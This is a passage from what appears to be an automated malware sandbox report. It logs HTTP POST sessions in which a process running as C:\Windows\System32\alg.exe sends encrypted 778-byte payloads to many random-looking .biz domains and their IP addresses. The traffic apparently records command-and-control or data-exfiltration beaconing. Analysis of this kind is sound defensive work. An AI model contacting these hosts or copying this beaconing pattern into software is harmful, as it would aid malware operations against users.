User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:01.041970968 CEST | 828 | OUT | Data Raw: 5c ee 8a ae 88 96 45 9d 30 03 00 00 a7 b6 eb bf 4d e1 76 65 fc 14 b0 89 12 82 24 8d 0f 9e 19 36 8c b3 61 24 ed 44 e0 df 9d 68 a6 e8 2e ef 17 fd fb b2 a6 ed 71 87 f1 ea 13 c2 a3 a3 6d e5 bb 4f 4a 1d f5 66 3c 0d 53 93 24 de e1 44 bd f4 7d 3c 23 58
Data Ascii: \E0Mve$6a$Dh.qmOJf<S$D}<#XRZJ6AzlVZNR:v16uFR]91G=4!Qr8lY90vtKJUesZ4''n~n|euHX'2


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
21          192.168.2.5  49929        47.129.31.212   80                7120  C:\Windows\System32\alg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:04.983599901 CEST  352                OUT        POST /hqlbcdtcv HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Host: xlfhhhm.biz
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                    Content-Length: 778
Oct 10, 2024 10:08:04.983599901 CEST  778                OUT        Data Raw: 8e 2f 39 47 ce 98 cc 67 fe 02 00 00 97 14 7b 62 08 9b 46 f0 be b8 ba c0 08 4f bb a9 75 8f 2e 5f 13 c2 42 69 49 e6 26 9f cc 4e 48 50 e9 be 96 78 2d 81 1f 84 33 71 e1 df 23 a0 7c 17 5e bd ec b1 01 be 70 0c 74 9c b0 1e 71 ec 51 5e f1 5a 5e bb e6 e2
                                                                    Data Ascii: /9Gg{bFOu._BiI&NHPx-3q#|^ptqQ^Z^9l/V{0hff8IDv4w4emC;kTJ4g:0PP<|pWx[|6H-_DIm{yx2+Rewn/IJT
Oct 10, 2024 10:08:06.318619013 CEST  409                IN         HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 10 Oct 2024 08:08:06 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=4023c7f5edf00b65daabb56de8caa952|8.46.123.33|1728547686|1728547686|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
22          192.168.2.5  49942        13.251.16.150   80                7120  C:\Windows\System32\alg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:06.546219110 CEST  346                OUT        POST /fymj HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Host: ifsaia.biz
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                    Content-Length: 778
Oct 10, 2024 10:08:06.546253920 CEST  778                OUT        Data Raw: 12 11 4f d5 b3 3d de 28 fe 02 00 00 2f 96 fd 66 19 c0 5c c0 ea c3 f0 ab fb f1 70 6e 4b 3d b1 b2 4d 7a 09 24 09 bb d0 43 af 0f 3f 33 d8 74 ff b4 72 e1 1b 5f cc 3d 18 81 0a 09 1a 3c a6 95 ae 63 11 bc 0d 57 ec 5a af ec 4d f3 a9 a9 c0 79 80 47 83 e4
                                                                    Data Ascii: O=(/f\pnK=Mz$C?3tr_=<cWZMyGB$RriPsW$\gB]>"6#s6Hs[Fnv %sO-x/|dU^C7{eTf$=Zm#a{V-q3NqI K=4S!EWx
Oct 10, 2024 10:08:07.906459093 CEST  408                IN         HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 10 Oct 2024 08:08:07 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=fdc7958316f7f82cf896377978fc8b65|8.46.123.33|1728547687|1728547687|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.5  49954        44.221.84.105   80                7120  C:\Windows\System32\alg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:08.193072081 CEST  355                OUT        POST /wbpbmvhlbk HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Host: saytjshyf.biz
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                    Content-Length: 778
Oct 10, 2024 10:08:08.193104029 CEST  778                OUT        Data Raw: 7d 39 88 43 8a 01 aa b3 fe 02 00 00 ff 32 25 32 c9 28 5c c2 39 32 30 bf 0b 44 88 7e 4b 6d 44 30 c4 ab 4a 9d 79 95 94 21 c7 cd 5f 80 e1 42 60 59 d5 b7 ac 09 0a 10 ee 3e f8 88 95 3e f5 0b c3 c3 5a 59 b1 d2 af 6e 00 a0 4b 10 47 88 9b 89 77 c1 41 2e
                                                                    Data Ascii: }9C2%2(\920D~KmD0Jy!_B`Y>>ZYnKGwA.ujO4H`\/(gu#fgbdxNLN3@JKvK.%F7/f3?qkq9sZL5x]{*ZqH:m%kB9W*I
Oct 10, 2024 10:08:08.680147886 CEST  411                IN         HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 10 Oct 2024 08:08:08 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=b948bb3605f26d1d18e0611c64a146aa|8.46.123.33|1728547688|1728547688|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.5  49960        18.141.10.107   80                7120  C:\Windows\System32\alg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:09.644643068 CEST  348                OUT        POST /qohnd HTTP/1.1
                                                                    Cache-Control: no-cache
                                                                    Connection: Keep-Alive
                                                                    Pragma: no-cache
                                                                    Host: vcddkls.biz
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                    Content-Length: 778
Oct 10, 2024 10:08:09.644656897 CEST  778                OUT        Data Raw: ec aa c9 52 37 7d 7c f5 fe 02 00 00 fa c3 24 17 11 40 a1 13 06 d9 08 4a 1b 82 41 73 72 72 aa 87 a2 04 17 bf bd 20 b5 86 16 20 f6 d4 56 d5 f7 42 f7 85 87 15 19 18 d9 52 f5 bf dd cd 8e 75 2e 00 47 3e 6f 12 ff c6 ad ed 4f bd 01 89 db da 71 20 41 22
                                                                    Data Ascii: R7}|$@JAsrr VBRu.G>oOq A"w8Zz5jy[{Eb/)?d=8c-[_!RBD:xzU[{D?2cu5.c*fLhhR}J_a"['59O#
Oct 10, 2024 10:08:10.993830919 CEST  409                IN         HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 10 Oct 2024 08:08:10 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=12a427fb942f650e67033fa3352542c2|8.46.123.33|1728547690|1728547690|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49972 | 172.234.222.143 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:11.208393097 CEST | 347 | OUT | POST /dvejgi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:11.208430052 CEST | 778 | OUT | Data Raw: 3f 4e 63 0d 44 2e 33 88 fe 02 00 00 7b ea 52 a3 ff bc 2e 09 54 39 4b eb 4f 6a fc df aa f3 1e cc 32 b7 f9 6d e7 69 3f 30 22 91 e6 38 e2 69 1b eb 38 bb e7 de 84 eb 1a 68 f3 ca fe 98 9c 3e ce 2f 56 1a 8a fd 2c 3b 5b 0c 23 92 4e 11 48 f7 81 96 b3 55
Data Ascii: ?NcD.3{R.T9KOj2mi?0"8i8h>/V,;[#NHUOfAu;+Ka |WVGX`E/v_7SFmClu1~#6nn''Xs_qE$Y2hw<#C7FP6v; MU$2"S# C


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49978 | 172.234.222.143 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:11.965732098 CEST | 353 | OUT | POST /kadnnjikurdd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:11.965732098 CEST | 778 | OUT | Data Raw: 1b 2e 30 e9 2e 00 d6 e2 fe 02 00 00 dc 0e 9f bf 74 be 8b 32 7f b1 39 aa 1c 46 c1 37 3d d4 be 61 68 32 ea 24 43 d7 3a 0d 65 cb bf 1b 2c 10 f8 18 29 fe db 4c 16 26 a2 10 a4 65 77 60 43 e0 64 54 33 4b 24 02 20 e6 f5 c7 e0 a3 0c 61 ce b4 9c 5e 9d cd
Data Ascii: .0.t29F7=ah2$C:e,)L&ew`CdT3K$ a^0bC]7[$sFu$k4GeZ}O ycMxK'73/Wp,zO|]lS,p7-)xp"|iz'bsn/F


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49984 | 34.246.200.160 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:12.755316973 CEST | 351 | OUT | POST /mngdwptvi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:12.755337954 CEST | 778 | OUT | Data Raw: 8e 69 f6 a6 7f 68 be 3d fe 02 00 00 41 f7 70 57 16 13 5c 94 c3 0f 60 d8 a9 87 f0 83 53 97 27 cb e2 41 3f 80 3e 99 c1 74 21 6b 50 38 aa 32 2f 53 02 6d 0f 50 ec f1 8f 78 8a 9b 72 e8 c1 c9 60 c5 39 f0 03 95 e8 d4 24 8d 93 23 12 33 06 5c c9 ae 8a 03
Data Ascii: ih=ApW\`S'A?>t!kP82/SmPxr`9$#3\q!cEpWlGZCMn%|L[CK8xMo *krQ$Rhv!P=]z5w]v%\v3H{^*WY/A$}cQ/&pt&:,<<D


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49985 | 34.246.200.160 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:12.903084993 CEST | 349 | OUT | POST /qqxxgql HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:12.903117895 CEST | 778 | OUT | Data Raw: a6 d5 93 24 02 e7 27 4e fe 02 00 00 e3 5f 21 6c 14 5a a7 0b 71 3c eb 78 bb 44 ee 87 3d 86 71 40 d3 0a 74 bc 06 4f a0 ed 9b 6d 96 6e d6 53 73 bd fe 2a 88 a3 df 1a 7a 54 72 2e 5c 0e 3a d9 53 75 73 7a 33 d8 14 e1 08 96 7a 53 7d 75 13 f9 ea 4d 09 23
Data Ascii: $'N_!lZq<xD=q@tOmnSs*zTr.\:Susz3zS}uM#[Zm%J*;2|,!-BhZ>COGhLY&rk\1|0@I*Z`Gmz0b.,-hok445+{
Oct 10, 2024 10:08:13.663165092 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=41ffbe5bfc2a4de03a461efa9255725f|8.46.123.33|1728547693|1728547693|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49992 | 18.208.156.248 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:13.898920059 CEST | 351 | OUT | POST /sgbnffiuqo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:13.898957014 CEST | 778 | OUT | Data Raw: fb 9e 71 34 e6 d0 43 c7 fe 02 00 00 fc 8f b9 1d b8 7f 2b 46 d6 80 a8 dd 46 c8 96 fc a7 84 eb 42 cb e1 2a 79 8f 24 d7 15 fd 62 74 20 d8 57 96 8a cb 6a 9e 5b 7d 94 c9 14 db 91 72 6a 56 55 2e 9d 4a 83 e5 94 11 5c fb cd 80 e4 65 79 96 3b cf 5d f0 f4
Data Ascii: q4C+FFB*y$bt Wj[}rjVU.J\ey;]`HNr*EXb'*mVnsR\Is?M^*e(VH!u@Iey8g0nH_}x{fbW&A=bV%y7.
Oct 10, 2024 10:08:14.383069038 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0e184ce44427340c1c5e1b1625d6bb8a|8.46.123.33|1728547694|1728547694|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49998 | 208.100.26.245 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:14.739132881 CEST | 346 | OUT | POST /ly HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:14.739180088 CEST | 778 | OUT | Data Raw: 8b fe df fc 1a 54 19 df fe 02 00 00 02 87 5c 7c 02 e0 83 eb 87 47 6b ab b0 5c 8a 53 24 bb 6f fa 2d 1c 5c 70 65 05 43 4a 2f ec 86 2a b5 7c 13 3d 83 0e 16 f3 df 37 f2 3b 02 e9 c0 80 9e 9c 22 9e 34 35 e3 70 7f 02 c7 15 08 7e 6d 68 1b af a9 15 04 88
Data Ascii: T\|Gk\S$o-\peCJ/*|=7;"45p~mhOjNo=#_&zNO/Kq5|(4I~Jn2Fd@[).r/9Q$1 Wa(b=X?i/;W@\e,PoTJZ6>~fwI
Oct 10, 2024 10:08:15.246716976 CEST | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 08:08:15 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 10, 2024 10:08:15.280325890 CEST | 347 | OUT | POST /jae HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:15.280405045 CEST | 778 | OUT | Data Raw: 02 82 ad 59 40 75 07 f1 fe 02 00 00 af a1 08 5a 48 0d b9 52 84 09 62 42 46 a6 f8 54 97 e5 52 40 69 a0 1e 1b cc 34 7e eb 14 91 0a b5 71 05 65 5b 12 69 8c b4 71 7e e2 76 2c dc de 02 82 c5 bf f6 d9 22 c7 59 d1 92 de 00 e7 8e 9b 7f fd f8 c5 13 fe 29
Data Ascii: Y@uZHRbBFTR@i4~qe[iq~v,"Y)7Vh>\p0:_2T418Z\x`"%dJO3bShZmJ*/z|y}\>)Uay&1X>m*AFB)4yp$bM<zM3z
Oct 10, 2024 10:08:15.397640944 CEST | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 08:08:15 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50007 | 13.251.16.150 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:15.650444031 CEST | 355 | OUT | POST /sptkirsqxflbf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:15.650468111 CEST | 778 | OUT | Data Raw: e1 df bf 41 44 d0 e2 40 fe 02 00 00 a6 c7 89 49 ea b5 92 a8 ac 78 8b 99 bf af 51 a5 f1 c6 24 21 cd e4 64 4b 5c 22 37 c7 4d b5 35 f9 e0 2d fe 9c 1c a2 fc 81 2d 2a c7 82 fe 0c 2c d5 89 69 31 f5 65 7a fa f0 3e 12 4d ce 87 62 6d a1 c8 78 9e 7e 3a e8
Data Ascii: AD@IxQ$!dK\"7M5--*,i1ez>Mbmx~:9`+9Nwu\'T7fv,op/N&w]Vh2Aus!baqRpP"&>YVb0aPn@ao[F`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50013 | 13.251.16.150 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:17.164724112 CEST | 343 | OUT | POST /v HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:17.164742947 CEST | 778 | OUT | Data Raw: 80 02 b8 11 09 ce 66 15 fe 02 00 00 28 1c 78 51 8d d5 40 36 b2 ee 66 0f 5b f3 67 36 e0 03 9d 4f 84 87 ed 55 7a 4b d7 81 44 04 43 c2 6e b0 be 70 af c2 3b 85 c1 bf 46 7c 65 24 44 e8 92 43 5e 74 63 1a 93 6b 18 cc 02 0f 61 e6 16 0a 86 e9 f1 7c 8a 6f
Data Ascii: f(xQ@6f[g6OUzKDCnp;F|e$DC^tcka|o,;4{tFp,?IBbv59u$U++r9#:Hp},3{H?b(([6``1,>"Fm?i#L,IdLRXV}
Oct 10, 2024 10:08:18.544004917 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=92a7e508a5af57b217c6f15172131ac7|8.46.123.33|1728547698|1728547698|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50014 | 44.221.84.105 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:18.760849953 CEST | 359 | OUT | POST /iafrakxbkhxwqo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:18.760870934 CEST | 778 | OUT | Data Raw: 52 d4 31 9f 2f a5 c5 0e fe 02 00 00 93 8e 7a c9 2a f0 bf 1b ab 4d c6 ec 12 07 a6 4f 92 8e 75 1a e7 1b c4 a3 75 be 8c 74 74 83 b7 8c 86 07 dc 43 f6 5f 45 f9 29 07 31 a4 86 25 fd 6a 86 ac 2f 8a ab d9 83 17 c0 59 68 19 44 eb d8 7c bc 86 dd 20 9b 54
Data Ascii: R1/z*MOuuttC_E)1%j/YhD| T\._Q)`Rx>vS#%dvaJ @Z'z^ imHU9SB6I@'MxIBc(3p1]*i="q5je.k/i@@yS
Oct 10, 2024 10:08:19.245417118 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=6638e573fa31beeb6bc46c84964c085c|8.46.123.33|1728547699|1728547699|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
